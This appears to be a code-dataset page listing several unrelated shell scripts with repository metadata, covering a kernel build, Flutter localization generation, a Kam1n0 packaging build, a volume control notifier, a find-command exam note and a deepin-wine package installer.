/kernel-build/linux-3.2.53-mempo-0.1.16-shell/build.sh
|
UTF-8
| 1,736
| 3.625
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash -e
# do NOT run this directly, run build-run.sh
linuxdir="$1"
if [ -z "$linuxdir" ] ; then
echo "ERROR undefined linuxdir." ; exit 1
fi
echo "Building linuxdir=$linuxdir"
echo "Creating sources info"
bash /home/kernelbuild/make-source-info
echo "Loading env"
. env.sh
export CONCURRENCY_LEVEL=8
export BUILD_NICENESS=0
echo "Starting build in $linuxdir"
(
# export TIMESTAMP_RFC3339='2013-12-02 17:28:00'
echo "CONCURRENCY_LEVEL=$CONCURRENCY_LEVEL"
echo "Will faketime: $TIMESTAMP_RFC3339"
echo "Entering Linux sources in $linuxdir"
cd "$linuxdir"
rm -rf ../buildlog ; mkdir -p ../buildlog
echo -n "Calculating checksum of the system: "
rm -f "../system_id.txt"
system_id=`sha256deep -l -r kernel/ kernel-img.conf kernel-pkg.conf | sort | sha256sum | cut -d" " -f1 `
echo "$system_id"
echo "$system_id" > "../system_id.txt"
echo -n "Calculating checksum of the sources: "
rm -f "../sources_id.txt"
sources_id=`sha256deep -l -r "." | sort | sha256sum | cut -d" " -f1 `
echo "$sources_id"
echo "$sources_id" > "../sources_id.txt"
cp ../configs/config-good.config .config || { echo "ERROR Could not copy the ../config file here." ; exit 1 ; }
config_id=`sha256sum .config | cut -d" " -f1`
echo "Using .config with ID=$config_id"
echo ""
echo "=== BUILD MAIN ================================="
faketime "$TIMESTAMP_RFC3339" nice -n "$BUILD_NICENESS" time make-kpkg --rootcmd fakeroot kernel_image kernel_headers kernel_debug kernel_doc kernel_manual --initrd --revision "$DEBIAN_REVISION" 2>1 | tee ../buildlog/build.result
echo "... returned from the main BUILD program"
echo
date
echo "================================================"
)
echo
echo "Done building in $linuxdir"
| true
|
2c2d59fdd8fa6621fed5a229dc406aeb2e38721e
|
Shell
|
baveku/FlutterStructureDemo
|
/i18n_generator.sh
|
UTF-8
| 1,288
| 3.25
| 3
|
[] |
no_license
|
# bin/sh
# Design By BachVQ
# Color Shell
RED='\033[0;31m'
GREEN='\033[0;32m'
LIGHTGREEN='\033[1;32m'
LIGHTCYAN='\033[1;36m'
NC='\033[0m' # No Color
PURPLE='\033[1;35m'
echo "${RED}-----------STEP 1: Remove all File Form Lang------------${NC}"
echo "${RED}REMOVING${NC}"
rm -rf lib/assets/lang/*
echo "${RED}DONE${NC}"
echo "${LIGHTCYAN}---------STEP 2: Generate Root File Language--------------${NC}"
flutter pub pub run intl_translation:extract_to_arb --output-dir=lib/assets/lang lib/app/localizations.dart
echo "${LIGHTCYAN}---------DONE--------------${NC}"
# Create File From Root Localization File
echo "${LIGHTCYAN}---------STEP 3: Generate For All SupportLanguages From ${PURPLE}Setting.json${LIGHTCYAN}--------------${NC}"
cd lib/assets/lang
for la in `jq "."supportLanguages"" ../../../setting.json | jq -r '.[]'`; do
echo "${LIGHTCYAN}Generating ${la} lang${NC}"
cp intl_messages.arb intl_v_${la}.arb
done
cd ../../../
# Generate Dart File From Intl File
echo "${GREEN}---------------STEP 4: Creating DartFile-----------------${NC}"
flutter pub pub run intl_translation:generate_from_arb --output-dir=lib/assets/lang --no-use-deferred-loading lib/app/localizations.dart lib/assets/lang/intl_v_*.arb
echo "${GREEN}---------------Generate DONE-----------------${NC}"
| true
|
3bf3bf062e73c072bba4bf90cd55a3e848073412
|
Shell
|
McGill-DMaS/Kam1n0-Community
|
/kam1n0-builds/linux-tar-gz/build-distribution.sh
|
UTF-8
| 931
| 3
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/sh
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
rm -rf $DIR/bins
mkdir $DIR/bins/
mkdir $DIR/bins/server/
mkdir $DIR/bins/ida-plugin/
cd $DIR/../../kam1n0
echo $DIR/../../kam1n0
mvn -DskipTests clean
echo Exit Code = $?
if [ ! $? -eq 0 ]; then
cd $DIR
echo maven build failure.
return 1
fi
mvn -DskipTests package
mvn -DskipTests package
echo Exit Code = $?
if [ ! $? -eq 0 ]; then
cd $DIR
echo maven build failure.
return 1
fi
cd $DIR
echo maven build succeeded
cp -r $DIR/../../kam1n0/build-bins/* $DIR/bins/server
cp -r $DIR/../../kam1n0-clients/ida-plugin/* $DIR/bins/ida-plugin
cd $DIR/bins/
tar -czvf Kam1n0-Server.tar.gz server/
tar -czvf Kam1n0-IDA-Plugin.tar.gz ida-plugin/
# rm -rf $DIR/bins/server/
# rm -rf $DIR/bins/ida-plugin/
# cd $DIR
# echo Distribution build completed. Please find linux distribution on $DIR/bins/.
| true
|
a8ced050b86a75aace58f835307837e5c2b16e4f
|
Shell
|
sentakuhm/.dotfiles
|
/.config/hypr/scripts/volume
|
UTF-8
| 1,220
| 4.125
| 4
|
[] |
no_license
|
#!/usr/bin/env sh
send_notification() {
volume=$(pamixer --get-volume)
if [ "${volume}" -gt 70 ]; then icon=notification-audio-volume-high
elif [ "${volume}" -gt 40 ]; then icon=notification-audio-volume-medium
elif [ "${volume}" -gt 0 ]; then icon=notification-audio-volume-low
else icon=notification-audio-volume-muted
fi
dunstify -a "changevolume" -u low -r "9993" -h int:value:"$volume" -i "$icon" "Volume: ${volume}%" -t 2000
canberra-gtk-play -i audio-volume-change -d "changeVolume" &
}
show_usage() {
echo "Usage: $(basename "$0") [up|down|mute]" >&2
echo " up Increase volume by 5%"
echo " down Decrease volume by 5%"
echo " mute Toggle mute/unmute"
}
case $1 in
up)
# Set the volume on (if it was muted)
pamixer -u
pamixer -i 5
send_notification "$1"
exit 0
;;
down)
pamixer -u
pamixer -d 5
send_notification "$1"
exit 0
;;
mute)
pamixer -t
if eval "$(pamixer --get-mute)"; then
dunstify -i notification-audio-volume-muted -a "changevolume" -t 2000 -r 9993 -u low "Muted"
else
send_notification up
fi
exit 0
;;
*)
show_usage
exit 1
;;
esac
| true
|
ab3f3eda66ee2c7a98d42bb9b57e4ce52d9a212b
|
Shell
|
anantgehi/May-2021-batch-notes
|
/Lab Exam Backups/OS_Lab_Exam_Backup/q3
|
UTF-8
| 782
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
find ~ -maxdepth 1 -type f
#Output:
#/home/surya/.bash_logout
#/home/surya/.bashrc
#/home/surya/.ICEauthority
#/home/surya/.esd_auth
#/home/surya/.bash_history
#/home/surya/.bash_profile.swo
#/home/surya/.bash_profile
#/home/surya/.lesshst
#/home/surya/.viminfo
# Used find command in home directory setting maxdepth to 1 to just query that folder
# and set type as f to just query the files.
# Since my home directory contails only hidden files so only those I've mentioned in output
# If you want just the file names then you can just use cut and get only the file names like this:-
# find ~ -maxdepth 1 -type f | cut -d'/' -f4
# Output
#.bash_logout
#.bashrc
#.ICEauthority
#.esd_auth
#.bash_history
#.bash_profile.swo
#.bash_profile
#.lesshst
#.viminfo
| true
|
eae88bf22ca087c3c44ab5c0ab286690c468ad96
|
Shell
|
steinvenic/deepin-wine-ubuntu
|
/online_install.sh
|
UTF-8
| 1,095
| 2.96875
| 3
|
[] |
no_license
|
#!/bin/bash -e
TMP_DIR="$(mktemp -d)"
DOWNLOAD_URL_PREFIX="https://github.com/wszqkzqk/deepin-wine-ubuntu/blob/master"
echo "开始下载deepin-wine安装包, 请稍后..."
wget -P "${TMP_DIR}" --content-disposition -c -T10 --tries=10 -q --show-progress "${DOWNLOAD_URL_PREFIX}"/{1.1udis86_1.72-2_i386.deb,1.2deepin-fonts-wine_2.18-12_all.deb,2.1deepin-libwine_2.18-12_i386.deb,2.2deepin-libwine-dbg_2.18-12_i386.deb,2.3deepin-libwine-dev_2.18-12_i386.deb,3.1deepin-wine32_2.18-12_i386.deb,3.2deepin-wine32-preloader_2.18-12_i386.deb,3.3deepin-wine32-tools_2.18-12_i386.deb,4deepin-wine_2.18-12_all.deb,5deepin-wine-binfmt_2.18-12_all.deb,6.1deepin-wine-plugin_1.0deepin2_amd64.deb,6.2deepin-wine-plugin-virtual_1.0deepin1_all.deb,7deepin-wine-helper_1.1deepin12_i386.deb,8deepin-wine-uninstaller_0.1deepin2_i386.deb}"?raw=true"
echo "正在安装, 请稍后"
sudo dpkg --add-architecture i386
sudo apt update && sudo apt install -y "${TMP_DIR}"/*.deb
echo "安装完毕
您可以访问: https://gitee.com/wszqkzqk/deepin-wine-containers-for-ubuntu/
下载您需要的deepin wine container"
| true
|
3796bcabbf2440a49e86c02443287053d41705d4
|
Shell
|
akashhello/Assignment
|
/GetOsVersion/test.sh
|
UTF-8
| 215
| 3.125
| 3
|
[] |
no_license
|
#!/bin/bash
var="129 148 181"
vars=( $var )
echo "First word of var: '${vars[0]}'"
echo "Second word of var: '${vars[1]}'"
echo "Third word of var: '${vars[2]}'"
echo "Number of words in var: '${#vars[@]}'"
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.